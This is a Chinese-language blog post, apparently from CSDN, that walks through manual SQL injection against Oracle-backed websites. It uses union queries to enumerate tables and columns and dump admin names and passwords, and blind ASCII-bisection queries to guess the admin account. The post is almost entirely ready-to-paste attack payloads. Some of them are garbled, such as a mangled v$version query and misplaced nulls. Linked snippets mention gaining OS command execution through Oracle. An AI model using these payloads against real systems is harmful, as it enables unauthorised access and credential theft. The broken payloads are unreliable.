Oracle第一种注入方式

最新推荐文章于 2024-05-14 08:53:38 发布
最新推荐文章于 2024-05-14 08:53:38 发布
阅读量233 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44735563/article/details/90454446
版权

Oracle第一种注入方式
1.判断oracle数据库: and exists(select * from dual)
and exists(select * from user_tables)
2.判断列数: order by
3.获取数据类型不匹配的列: id=100 union select null,null,null,null, null, null, from dual
在每列上逐个用数字代替null,1,null…from dual, 如果返回正常说明该列为数字类型,反之则为非数字类型。
也可以逐个用引号引起来如:‘null’,null…from dual, 返回正常说明该列为字符类型,反之为非数字类型。
5.获取基本信息: 获取数据库版本
(select banner from sys.v_ v e r s i o n w h e r e r o w n u m = 1 ) 获 取 操 作 系 统 版 本 ( s e l e c t m e m b e r f r o m v version where rownum=1) 获取操作系统版本 ( select member from v versionwhererownum=1)(selectmemberfromvlogfile where rownum=1)
获取连接数据库的当前用户
( select SYS_CONTEXT (‘USERENV’,‘CURRENT_USER’)from dual)
获取数据库
(select owner from all_tables where rownum=1)
6.获取连接数据库的当前用户:id=100 union select null,( select SYS_CONTEXT (‘USERENV’,‘CURRENT_USER’)from dual),null,null from dual
7.获取第一个表:id=100 union select null,( select table_name from user_tables where rownum=1),null,null from dual
8.获取第二个表:id=100 union select null,( select table_name from user_tables where rownum=1 and table_name<>‘xxxxx’),null,null,null from dual //单引号里的为上一个表名,以此类推就可以得到所有的表名
9.获取第一个列名:<假设我们得到管理员表名为:admin>
id=-100 union select null,(select column_name from user_tab_columns where table_name=‘admin’ and rownum=1),4,5,6 from dual,null,null, from dual //单引号里的为表名

Oracle:
9.获取第二个列名:<假设获取第一个列名为EMPLOYEE_ID>
id=-100 union select null,(select column_name from user_tab_columns where table_name=‘admin’ and rownum=1 and column_name<>‘EMPLOYEE_ID’),4,5,6 from dual,null,null from dual //<>‘EMPLOYEE_ID’ 不等于第一个列
10.获取数据库:union select 1,2,name,4,5,6 from admin
union select 1,2,pass,4,5,6 from admin

Oracle第二种注入方式
1.判断数据库中的表:网址后加上:and (select count() from admin) <>0返回正常,说明存在admin表。如果返回错误,可将admin 改为username、manager等常用表名继续猜解。
2.判断下该网站下有几个管理员:and (select count() from admin)=1,返回正常说明只有一个管理员
3.指定表名获取列名:and (select count(name) from admin)>=0返回正常,说明存在name字段
接下来采用ASCII码折半法猜解管理员帐号和密码:
1.判断管理员名字长度:
and (select count() from admin where length(name)>=5)=1
说明:length()函数用于求字符串的长度,此处猜测用户名的长度和5比较,即猜测是否由5个字符组成
2.判断管理员账号:and (select count() from admin where ascii(substr(name,1,1))>=97)=1
说明:substr()函数用于截取字符串,ascii()函数用于获取字符的ascii码,此处的意思是截取name字段的第一个字符,获取它的ascii码值,查询ascii码表可知97为字符a
判断name字段第二个字符:and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin

想学渗透
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2141
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
ORACLE ORDER BY用法总结
热门推荐
朝着梦想 渐行前进
11-15 3万+
今天在逛论坛的时候看到shiyiwan同学写了一个很简单的语句,可是order by后面的形式却比较新颖(对于我来说哦),以前从来没看过这种用法,就想记下来,正好总结一下ORDER BY的知识。 1、ORDER BY 中关于NULL的处理缺省处理,Oracle在Order by 时认为null是最大值,所以如果是ASC升序则排在最后,DESC降序则排在最前。当然,你也可以使用nul
Oracle注入
weixin_48141183的博客
11-03 6780
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
2024年Go最新干货 Oracle注入和漏洞利用姿势总结,统统都会
最新发布
qq_38197819的博客
05-14 441
Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。此外,还需要数据库服务器可以出网。
sql注入 order by
weixin_42321419的博客
06-17 6060
做个笔记,,,order by +表字段名 +【降序(desc)或默认升序】或者order by +表列数(也即字段)+【降序(desc)或默认升序】
SQL注入攻击与防御(第2版).part1
06-26
SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,《安全技术经典译丛:SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入问题。  《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009...
一个关于基于ssm,mysql(也含oracle方式)实现的分页查询.rar
07-26
这个压缩包文件“一个关于基于ssm,mysql(也含oracle方式)实现的分页查询.rar”主要涉及到如何在SSM环境下,使用MySQL和Oracle数据库进行分页查询的实践案例。 首先,Spring作为核心容器,负责管理对象的生命周期...
第十节 Sqlmap注入参数1-01
09-15
在检索结果时,Sqlmap 使用一种机制,在这种机制中,所有条目都被转换为字符串类型,并在NULL值的情况下用空格字符替换。这样做是为了防止出现任何错误状态(例如,将空值与字符串值连接起来),并简化数据检索过程...
oracle-jdbc-12.2.0.1.zip
09-27
Oracle JDBC驱动主要有四种类型: Thin、 Thick、JDBC-ODBC Bridge和Universal Driver,其中 Thin 驱动是最常用的一种,因为它是一种轻量级的纯Java实现,无需在客户端安装Oracle数据库客户端软件。 ojdbc8-资源....
Oracle Database 11g 第 2 版 (11.2.0.4) JDBC 驱动程序— 包含 JDBC 示例程序。
04-02
Oracle Database 11g 第 2 版 (11.2.0.4) 是一个强大的关系型数据库管理系统,广泛应用于企业级应用中。JDBC(Java Database Connectivity)是Java平台上的标准数据库连接接口,允许Java应用程序通过Java代码与各种...
Oracle数据库中SQL注入攻击的检测与防御
03-01
论文介绍了SQL注人攻击及其常用的攻击技术,给出了在Oracle数据库中对SQL注人攻击的检测方法与 防御措施,文中的检测方法和预防措施可以应用到任意的数据库系统中。
sql注入实验
ByeBye(野蛮生长)
05-09 1355
sql注入 SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 注入方式有GET注入,POST注入,COOKIE注入,HTTP HEADER注入方式,其中DSQLTools利用的是GET注入方式。简单来说它的目标是网址中含有id=xxx类似的动态页面。 DSQLTools介绍 自创的注入引擎,能检测更多存在注入的连接。使用多线程技术,...
MySQL&SQL server&Oracle&Access&PostgreSQL数据库sql注入详解 _
mingyqf的博客
03-25 2514
本文作者: Yokan 本文链接: https://www.cnblogs.com/yokan/p/15456374.html 判断数据库的类型 当我们通过一些测试,发现存在SQL注入之后,首先要做的就是判断数据库的类型。 常用的数据库有MySQL、Access、SQLServer、Oracle、PostgreSQL。虽然绝大多数数据库的大部分SQL语句都类似,但是每个数据库还是有自己特殊的表的。通过表我们可以分辨是哪些数据库。 MySQL数据库的特有的表是 information_schema.table
javascript连接并操纵oracle
liusongtao的专栏
06-03 4164
javascript的强大是毋庸置疑了,最近用到javascript连接oracle 10g企业版,并进行操作;看了看网上也有一部分的内容,但是都不是很详细,找了好些个总结后,自己尝试完成了!代码如下 // alert("liusongtao"); var strConnString = "Provider=OraOLEDB.Oracle;Data Source=o
浅谈SQL注入(拼接字符串注入
李志华 博客 专栏
07-16 8448
SQL注入解释:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注入原因      写SQL语句的时候会用拼接字符串的方法,所以会发生SQL注入这种问题。SQL注入后果        如果是让别人发现了你的这个注入的漏洞的话,你的整个数据库有可能直接获得管理员的权限,也就是说这个数据库又可以能掌握在别人的手里,
oracle 登录sql注入,oracle 轻松小sql注入
weixin_34797773的博客
04-04 130
今天看tom的有提到一个很有趣的东东,只授权的procedure execute,别人就可以sql注入,以后你可得小心了,下面请看我的试验[oracle@aix ~]$ sqlplus anbob/anbobSQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011Copyright (c) 1982, 2007, O...
实例演示oracle注入获取cmdshell的全过程
杨航的专栏
12-14 1万+
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成   /xxx.jsp?id=1 and '1'   的形式即可。(用" 'a'|| "是为了让语句返回true值)   语句有点长,可能要用post提交。   以下是各个步骤:   1.创建包   通过注入 SYS.DBMS_EX
oracle怎么使用绑定变量步骤
06-10
在这个例子中,我们将参数索引设置为 1,表示第一个参数(即绑定变量)。然后,我们将参数值设置为 10。 4. 执行 SQL 语句,例如: ``` ResultSet rs = ps.executeQuery(); ``` 5. 处理结果集,例如: ``` while...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值